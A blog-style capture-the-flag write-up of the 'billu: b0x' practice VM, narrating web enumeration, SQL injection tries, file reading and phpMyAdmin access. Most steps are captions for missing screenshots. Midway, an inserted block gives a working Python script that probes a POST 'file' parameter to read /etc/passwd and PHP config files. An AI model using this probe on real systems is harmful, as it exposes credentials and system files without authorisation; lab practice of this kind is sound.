Monday, 25 June 2018

billu b0x - CTF

While I was waiting for the results from john from the last post, I decided to run another VM with a new CTF box. This time I tried "billu: b0x", a machine prepared by Manish Kishan Tanwar. I started from...

... the webpage ;)

 

Yeah. So we should show some sql-ninja-rap-style... right?


Right? ;]

Checking:


The phpmy directory revealed some more files, for example:


Next directory (with directory indexing enabled):

Let's rescan the webserver with a new parameter:


Checking:

More:

More:



Good. Next:

Trying harder... ;]


Checking:


Yes. So...

Maybe now it's time to check the file parameter with POST?

What the hack!? ;[

After a while, the reason was simple enough to proceed:


Now it's easier:

Checking more files:
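The post shows the requests only as screenshots, so here is an added example (my own code, not the author's and not anything taken from the box) of the check being done above: sending candidate paths in a POST `file` parameter and keeping only the responses that look like the real file rather than an error page. The endpoint URL, the candidate list and the content markers are assumptions; `fetch` is injectable so the logic can be exercised against a fake responder without a target.

```python
import urllib.parse
import urllib.request

# Content markers that show a response really carries the requested file and
# not an include() warning or a blank page. Assumed/illustrative list.
FILE_MARKERS = {
    "/etc/passwd": ("root:x:0:0", "root:*:0:0"),
    "/etc/hosts": ("127.0.0.1",),
}


def looks_like_file(path, body):
    """Return True if `body` contains content expected for `path`."""
    markers = FILE_MARKERS.get(path)
    if markers:
        return any(m in body for m in markers)
    # Fallback for PHP sources read back as text (e.g. a config file):
    # the raw source will contain the opening tag, a rendered page will not.
    return "<?php" in body


def http_post(url, fields, timeout=10):
    """Send a form-encoded POST and return the body as text (network helper)."""
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe_file_param(url, candidates, param="file", fetch=http_post):
    """Try each candidate path as POST <param>=<path> and return a dict of
    the paths whose responses look like the actual file content.
    `fetch(url, fields) -> str` is injectable for offline testing."""
    found = {}
    for path in candidates:
        try:
            body = fetch(url, {param: path})
        except Exception:  # connection refused, HTTP 4xx/5xx, timeouts
            continue
        if looks_like_file(path, body):
            found[path] = body
    return found


if __name__ == "__main__":
    # Hypothetical endpoint; the original post does not name one.
    TARGET = "http://target.example/page.php"
    hits = probe_file_param(TARGET, ["/etc/passwd", "/etc/hosts", "c.php"])
    for path, body in hits.items():
        print(f"[+] {path} readable via POST file= ({len(body)} bytes)")
```

The marker check matters more than it looks: a file-inclusion endpoint that prints a PHP warning for a missing file still returns HTTP 200, so "got a response" is not evidence of a read. Add the markers for whatever files you expect on the target before trusting a hit.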


What about c.php?

Let's check it:

We will get back to it later... because I found this one response:


Checking:

Looks good. Reading the content of the file:



Burp-point-of-view:


I decided to check it with my 'new' cookies:


Now we are here:


OK, let's move to PMA (phpMyAdmin) for now. Checking the password:


...and...


... after I tried a few small tricks:


I decided to look around and grab some interesting info (if there is any... ;> )


OK, cool. I was wondering if there would be some kind of PMA config to find, and after a while I found the setup directory:

Cool, but still not there.

You wish ;]

Next thing:


Good, good, but we need to enable the 'save' button first:


After no luck:


...I tried to read some ('maybe') old config file... This is what I found:


Checking:

Good!


Cheers
o/

